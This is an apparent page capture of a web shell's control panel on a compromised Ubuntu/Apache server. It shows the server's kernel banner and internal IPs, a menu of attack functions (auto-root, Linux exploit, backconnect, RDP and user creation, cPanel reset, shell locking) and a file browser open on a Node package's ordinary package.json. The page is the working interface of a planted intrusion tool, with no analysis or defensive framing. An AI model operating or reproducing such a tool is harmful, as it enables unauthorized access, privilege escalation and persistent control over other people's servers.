Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
type-fest /
[ HOME SHELL ]
Name
Size
Permission
Action
source
[ DIR ]
drwxrwxr-x
ts41
[ DIR ]
drwxrwxr-x
base.d.ts
1.68
KB
-rw-rw-r--
index.d.ts
115
B
-rw-rw-r--
license
1.09
KB
-rw-rw-r--
package.json
1.01
KB
-rw-rw-r--
readme.md
29.9
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "type-fest", "version": "0.20.2", "description": "A collection of essential TypeScript types", "license": "(MIT OR CC0-1.0)", "repository": "sindresorhus/type-fest", "funding": "https://github.com/sponsors/sindresorhus", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "https://sindresorhus.com" }, "engines": { "node": ">=10" }, "scripts": { "//test": "xo && tsd && tsc", "test": "xo && tsc" }, "files": [ "index.d.ts", "base.d.ts", "source", "ts41" ], "keywords": [ "typescript", "ts", "types", "utility", "util", "utilities", "omit", "merge", "json" ], "devDependencies": { "@sindresorhus/tsconfig": "~0.7.0", "tsd": "^0.13.1", "typescript": "^4.1.2", "xo": "^0.35.0" }, "types": "./index.d.ts", "typesVersions": { ">=4.1": { "*": [ "ts41/*" ] } }, "xo": { "rules": { "@typescript-eslint/ban-types": "off", "@typescript-eslint/indent": "off", "node/no-unsupported-features/es-builtins": "off" } } }
Close